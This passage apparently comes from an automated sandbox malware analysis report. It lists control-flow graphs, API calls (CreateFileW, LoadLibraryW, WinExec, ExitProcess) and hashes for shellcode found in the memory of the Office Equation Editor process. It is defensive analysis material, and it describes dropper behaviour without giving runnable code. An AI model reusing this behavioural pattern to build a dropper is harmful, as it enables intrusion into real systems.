171->178 179 355074a-355074d 171->179 175->174 178->160 179->171 182 355074f 179->182 182->148
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 35ba5fed82909b8086bb5101b70b640bf0c92276bda632281e70d5fe75a30679
                      • Instruction ID: 2913be7083c5d36fc6fa7d6c6ef05fe9a672dc15c5c1ccf7ed8d4dd98b2a6e1d
                      • Opcode Fuzzy Hash: 35ba5fed82909b8086bb5101b70b640bf0c92276bda632281e70d5fe75a30679
                      • Instruction Fuzzy Hash: 7D21DA744183457ED610EA60ECA1FAFB769FFC1740F148E0AF5514B0F0D6B0F5088A96

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 184 35506ea-3550701 WinExec call 355070a 190 3550753 184->190 191 3550703 184->191 192 3550755-3550759 190->192 193 355075b-355075f 190->193 194 3550705-355070f ExitProcess 191->194 195 3550774-3550776 191->195 192->193 196 3550767-355076e 192->196 193->195 197 3550761-3550765 193->197 199 3550786-3550787 195->199 200 3550770 196->200 201 3550772 196->201 197->195 197->196 200->195 201->195 202 3550778-3550781 201->202 205 3550783 202->205 206 355074a-355074d 202->206 205->199 206->202 207 355074f 206->207 207->190
                      APIs
                      • WinExec.KERNEL32(?,00000001,?,035506E2,?,035506A5,?,?,0355068C,00000000,00000000,00000000,00800000,0355051B,000001BB,00000000), ref: 035506F7
                        • Part of subcall function 0355070A: ExitProcess.KERNELBASE(00000000,?,035506FE,?,035506E2,?,035506A5,?,?,0355068C,00000000,00000000,00000000,00800000,0355051B,000001BB), ref: 0355070F
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: ExecExitProcess
                      • String ID:
                      • API String ID: 4112423671-0
                      • Opcode ID: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                      • Instruction ID: 2b0404648b49097b575e9579872ccb874068ab3967949b084678a7f69aeb16e7
                      • Opcode Fuzzy Hash: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                      • Instruction Fuzzy Hash: 4AF0F45993424221CB70F238A8747FAAB50FB91740FCC8A43FC92070F5D268B0C38E5A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 208 3550488-3550490 call 355049b 212 35504f7-3550507 call 355050b 208->212 213 3550492-3550493 208->213 219 355050e-3550556 call 3550541 212->219 214 3550494-35504ba CreateFileW 213->214 215 35504fa-3550507 213->215 217 35504c2-35504d0 214->217 218 35504bd call 35504d2 214->218 215->219 218->217 231 35505ce-35505d2 219->231 232 3550559-35505a5 call 3550583 219->232 233 35505d4-35505da 231->233 234 3550639-355063a 231->234 245 355061d 232->245 246 35505a8 232->246 239 3550641-355064d 233->239 240 35505dc-35505f0 call 35505f9 233->240 236 355063c-3550640 234->236 236->239 247 3550684-355068f call 3550698 239->247 248 355064f-3550654 239->248 253 355065b-3550682 240->253 259 35505f2 240->259 250 355061f-3550634 call 3550637 245->250 246->250 251 35505ab-35505c7 call 35505dd 246->251 262 35506f6-3550701 WinExec call 355070a 247->262 263 3550691-3550696 247->263 252 3550656 248->252 248->253 264 3550697 250->264 265 3550636 250->265 251->231 252->253 253->236 267 35505f4-35505fd 259->267 268 3550659 259->268 277 3550753 262->277 278 3550703 262->278 270 355069a-35506b0 call 35506b9 263->270 264->270 265->234 268->253 290 35506b2 270->290 291 355071e-3550726 270->291 281 3550755-3550759 277->281 282 355075b-355075f 277->282 283 3550705-355070f ExitProcess 278->283 284 3550774-3550776 278->284 281->282 286 3550767-355076e 281->286 282->284 287 3550761-3550765 282->287 289 3550786-3550787 284->289 296 3550770 286->296 297 3550772 286->297 287->284 287->286 292 35506b4-35506b5 290->292 293 355071d 290->293 294 355074c-3550750 291->294 295 3550728-355072a 291->295 298 35506b7-35506e3 call 35506ea 292->298 299 355072b-3550730 292->299 293->291 294->277 295->299 296->284 297->284 300 3550778-3550781 297->300 303 3550732-3550736 299->303 304 355071f-3550730 call 3550739 299->304 307 3550783 300->307 308 355074a-355074d 300->308 304->303 307->289 308->300 311 355074f 308->311 311->277
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: e64f2943b22b50b0227c41d232274885eb4430b4b4712855f3affb9db3c6ca98
                      • Instruction ID: a04d93455570258fa4660757828c2a099812ae15105374e71046e050b93df93c
                      • Opcode Fuzzy Hash: e64f2943b22b50b0227c41d232274885eb4430b4b4712855f3affb9db3c6ca98
                      • Instruction Fuzzy Hash: 0C41AB6044D3C62ED622EB64AE7AB59BF647F93700F1885CFF9814F1F3E651A2048219

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 313 35504d2-35504e3 LoadLibraryW call 35504e7 316 35504e5-35504ea 313->316 317 355054a-3550556 313->317 321 35504f6-3550548 call 355050b call 3550541 316->321 319 35505ce-35505d2 317->319 320 3550559-35505a5 call 3550583 317->320 322 35505d4-35505da 319->322 323 3550639-355063a 319->323 337 355061d 320->337 338 35505a8 320->338 321->317 330 3550641-355064d 322->330 331 35505dc-35505f0 call 35505f9 322->331 326 355063c-3550640 323->326 326->330 340 3550684-355068f call 3550698 330->340 341 355064f-3550654 330->341 347 355065b-3550682 331->347 354 35505f2 331->354 344 355061f-3550634 call 3550637 337->344 338->344 345 35505ab-35505bb 338->345 358 35506f6-3550701 WinExec call 355070a 340->358 359 3550691-3550696 340->359 346 3550656 341->346 341->347 360 3550697 344->360 361 3550636 344->361 356 35505c1-35505c7 call 35505dd 345->356 346->347 347->326 363 35505f4-35505fd 354->363 364 3550659 354->364 356->319 375 3550753 358->375 376 3550703 358->376 367 355069a-35506b0 call 35506b9 359->367 360->367 361->323 364->347 388 35506b2 367->388 389 355071e-3550726 367->389 379 3550755-3550759 375->379 380 355075b-355075f 375->380 381 3550705-355070f ExitProcess 376->381 382 3550774-3550776 376->382 379->380 384 3550767-355076e 379->384 380->382 385 3550761-3550765 380->385 387 3550786-3550787 382->387 394 3550770 384->394 395 3550772 384->395 385->382 385->384 390 35506b4-35506b5 388->390 391 355071d 388->391 392 355074c-3550750 389->392 393 3550728-355072a 389->393 396 35506b7-35506e3 call 35506ea 390->396 397 355072b-3550730 390->397 391->389 392->375 393->397 394->382 395->382 398 3550778-3550781 395->398 401 3550732-3550736 397->401 402 355071f-3550730 call 3550739 397->402 405 3550783 398->405 406 355074a-355074d 398->406 402->401 405->387 406->398 409 355074f 406->409 409->375
                      APIs
                      • LoadLibraryW.KERNEL32(035504C2), ref: 035504D2
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 95e205f9d6290a41483edb5a89c5d9b0e65468ea3138ce4cdbe6f6b6fcd76b8b
                      • Instruction ID: 6d36abb07379e0ca3f1158d2ce0ac74e6f9c6d9f0055c330103aedcf1e383353
                      • Opcode Fuzzy Hash: 95e205f9d6290a41483edb5a89c5d9b0e65468ea3138ce4cdbe6f6b6fcd76b8b
                      • Instruction Fuzzy Hash: 2031DF6044D3C62ED722EB649D7AB59BF74BF93600F1884CFF9810F0F3EA55A2008615

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 411 3550406-3550414 call 355078a call 3550422 416 3550467-3550482 411->416 417 3550417 411->417 418 3550484-3550487 416->418 419 3550419-355041c 417->419 420 3550488-3550490 call 355049b 417->420 418->420 419->418 421 355041f 419->421 433 35504f7-3550507 call 355050b 420->433 434 3550492-3550493 420->434 422 3550494-35504ba CreateFileW 421->422 423 3550421-355043f call 3550449 421->423 427 35504c2-35504d0 422->427 428 35504bd call 35504d2 422->428 423->422 443 3550441-3550466 call 3550488 423->443 428->427 441 355050e-3550556 call 3550541 433->441 434->422 437 35504fa-3550507 434->437 437->441 455 35505ce-35505d2 441->455 456 3550559-35505a5 call 3550583 441->456 443->416 457 35505d4-35505da 455->457 458 3550639-355063a 455->458 469 355061d 456->469 470 35505a8 456->470 463 3550641-355064d 457->463 464 35505dc-35505f0 call 35505f9 457->464 460 355063c-3550640 458->460 460->463 471 3550684-355068f call 3550698 463->471 472 355064f-3550654 463->472 477 355065b-3550682 464->477 483 35505f2 464->483 474 355061f-3550634 call 3550637 469->474 470->474 475 35505ab-35505c7 call 35505dd 470->475 486 35506f6-3550701 WinExec call 355070a 471->486 487 3550691-3550696 471->487 476 3550656 472->476 472->477 488 3550697 474->488 489 3550636 474->489 475->455 476->477 477->460 491 35505f4-35505fd 483->491 492 3550659 483->492 501 3550753 486->501 502 3550703 486->502 494 355069a-35506b0 call 35506b9 487->494 488->494 489->458 492->477 514 35506b2 494->514 515 355071e-3550726 494->515 505 3550755-3550759 501->505 506 355075b-355075f 501->506 507 3550705-355070f ExitProcess 502->507 508 3550774-3550776 502->508 505->506 510 3550767-355076e 505->510 506->508 511 3550761-3550765 506->511 513 3550786-3550787 508->513 520 3550770 510->520 521 3550772 510->521 511->508 511->510 516 35506b4-35506b5 514->516 517 355071d 514->517 518 355074c-3550750 515->518 519 3550728-355072a 515->519 522 35506b7-35506e3 call 35506ea 516->522 523 355072b-3550730 516->523 517->515 518->501 519->523 520->508 521->508 524 3550778-3550781 521->524 527 3550732-3550736 523->527 528 355071f-3550730 call 3550739 523->528 531 3550783 524->531 532 355074a-355074d 524->532 528->527 531->513 532->524 535 355074f 532->535 535->501
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: b146575a155a04e85c10758ddeafa2a86f967b33429f9f7ae20273845a92c513
                      • Instruction ID: 307c3557f84c4c38534d51a3b5f528840e9d49ff77f46d2b5d20c6eed0f5e28a
                      • Opcode Fuzzy Hash: b146575a155a04e85c10758ddeafa2a86f967b33429f9f7ae20273845a92c513
                      • Instruction Fuzzy Hash: 2421E06640C3C19FE321D7706E7A764AE207F82701F1C898BAEC54F1F3D660B1069356

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 537 3550422-3550428 call 355078a 540 355042f-355043f 537->540 541 355042a call 3550449 537->541 545 3550494-35504ba CreateFileW 540->545 546 3550441-3550490 call 3550488 call 355049b 540->546 541->540 547 35504c2-35504d0 545->547 548 35504bd call 35504d2 545->548 562 35504f7-3550507 call 355050b 546->562 563 3550492-3550493 546->563 548->547 566 355050e-3550556 call 3550541 562->566 563->545 564 35504fa-3550507 563->564 564->566 575 35505ce-35505d2 566->575 576 3550559-35505a5 call 3550583 566->576 577 35505d4-35505da 575->577 578 3550639-355063a 575->578 589 355061d 576->589 590 35505a8 576->590 583 3550641-355064d 577->583 584 35505dc-35505f0 call 35505f9 577->584 580 355063c-3550640 578->580 580->583 591 3550684-355068f call 3550698 583->591 592 355064f-3550654 583->592 597 355065b-3550682 584->597 603 35505f2 584->603 594 355061f-3550634 call 3550637 589->594 590->594 595 35505ab-35505c7 call 35505dd 590->595 606 35506f6-3550701 WinExec call 355070a 591->606 607 3550691-3550696 591->607 596 3550656 592->596 592->597 608 3550697 594->608 609 3550636 594->609 595->575 596->597 597->580 611 35505f4-35505fd 603->611 612 3550659 603->612 621 3550753 606->621 622 3550703 606->622 614 355069a-35506b0 call 35506b9 607->614 608->614 609->578 612->597 634 35506b2 614->634 635 355071e-3550726 614->635 625 3550755-3550759 621->625 626 355075b-355075f 621->626 627 3550705-355070f ExitProcess 622->627 628 3550774-3550776 622->628 625->626 630 3550767-355076e 625->630 626->628 631 3550761-3550765 626->631 633 3550786-3550787 628->633 640 3550770 630->640 641 3550772 630->641 631->628 631->630 636 35506b4-35506b5 634->636 637 355071d 634->637 638 355074c-3550750 635->638 639 3550728-355072a 635->639 642 35506b7-35506e3 call 35506ea 636->642 643 355072b-3550730 636->643 637->635 638->621 639->643 640->628 641->628 644 3550778-3550781 641->644 647 3550732-3550736 643->647 648 355071f-3550730 call 3550739 643->648 651 3550783 644->651 652 355074a-355074d 644->652 648->647 651->633 652->644 655 355074f 652->655 655->621
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 5a71ed8987e8d8c4b86d7d3fe43074f0a1ffd66f61ecad9f1a3eaca4471e8baa
                      • Instruction ID: 9bc764c0e7a374e206bd26c7e485e9ec90d64e9824e3d2cd644723ec342360c2
                      • Opcode Fuzzy Hash: 5a71ed8987e8d8c4b86d7d3fe43074f0a1ffd66f61ecad9f1a3eaca4471e8baa
                      • Instruction Fuzzy Hash: 6321CA6640D3C08FE322CB306E2A754BF207B53304F0D8ACBA9C48F1F3D6A5A14A9312

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 657 3550449-3550490 call 3550488 call 355049b 667 35504f7-3550507 call 355050b 657->667 668 3550492-3550493 657->668 674 355050e-3550556 call 3550541 667->674 669 3550494-35504ba CreateFileW 668->669 670 35504fa-3550507 668->670 672 35504c2-35504d0 669->672 673 35504bd call 35504d2 669->673 670->674 673->672 686 35505ce-35505d2 674->686 687 3550559-35505a5 call 3550583 674->687 688 35505d4-35505da 686->688 689 3550639-355063a 686->689 700 355061d 687->700 701 35505a8 687->701 694 3550641-355064d 688->694 695 35505dc-35505f0 call 35505f9 688->695 691 355063c-3550640 689->691 691->694 702 3550684-355068f call 3550698 694->702 703 355064f-3550654 694->703 708 355065b-3550682 695->708 714 35505f2 695->714 705 355061f-3550634 call 3550637 700->705 701->705 706 35505ab-35505c7 call 35505dd 701->706 717 35506f6-3550701 WinExec call 355070a 702->717 718 3550691-3550696 702->718 707 3550656 703->707 703->708 719 3550697 705->719 720 3550636 705->720 706->686 707->708 708->691 722 35505f4-35505fd 714->722 723 3550659 714->723 732 3550753 717->732 733 3550703 717->733 725 355069a-35506b0 call 35506b9 718->725 719->725 720->689 723->708 745 35506b2 725->745 746 355071e-3550726 725->746 736 3550755-3550759 732->736 737 355075b-355075f 732->737 738 3550705-355070f ExitProcess 733->738 739 3550774-3550776 733->739 736->737 741 3550767-355076e 736->741 737->739 742 3550761-3550765 737->742 744 3550786-3550787 739->744 751 3550770 741->751 752 3550772 741->752 742->739 742->741 747 35506b4-35506b5 745->747 748 355071d 745->748 749 355074c-3550750 746->749 750 3550728-355072a 746->750 753 35506b7-35506e3 call 35506ea 747->753 754 355072b-3550730 747->754 748->746 749->732 750->754 751->739 752->739 755 3550778-3550781 752->755 758 3550732-3550736 754->758 759 355071f-3550730 call 3550739 754->759 762 3550783 755->762 763 355074a-355074d 755->763 759->758 762->744 763->755 766 355074f 763->766 766->732
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 936930110fdeff66b2713b27d8f5f50081c8362fdfa09f507a8f920a6c88f281
                      • Instruction ID: aa5786ed48b6e259042bd5b115962c9306311220ad48ec60756180c5e98714a8
                      • Opcode Fuzzy Hash: 936930110fdeff66b2713b27d8f5f50081c8362fdfa09f507a8f920a6c88f281
                      • Instruction Fuzzy Hash: 53018E6644D3C09FE322C7706D6AB90BE607B52704F0DCA8FAAC44F1E3D7A4A1459312

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 768 355049b-35504bd CreateFileW call 35504d2 771 35504c2-35504d0 768->771
                      APIs
                      • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 035504B8
                        • Part of subcall function 035504D2: LoadLibraryW.KERNEL32(035504C2), ref: 035504D2
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: CreateFileLibraryLoad
                      • String ID:
                      • API String ID: 2049390123-0
                      • Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                      • Instruction ID: 8187ae89bb146c22269ac5fe0ddd921eb5322ba25e05a5a5db296e7a4362de1d
                      • Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                      • Instruction Fuzzy Hash: EEE0C2341483806AE131D7301D6AFA5AEA43F81B04F09C88AB7C8AF0E3C6A070058212

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 775 355070a-355070f ExitProcess
                      APIs
                      • ExitProcess.KERNELBASE(00000000,?,035506FE,?,035506E2,?,035506A5,?,?,0355068C,00000000,00000000,00000000,00800000,0355051B,000001BB), ref: 0355070F
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                      • Instruction ID: a1a47d0b9abfc9148a52e537f2836ffa651bda31bda448053ede3c5348415af0
                      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                      • Instruction Fuzzy Hash: 1CD05E752115028FD304DF04D950E52F37AFFC4710B24C269E5014B669C330E891CA90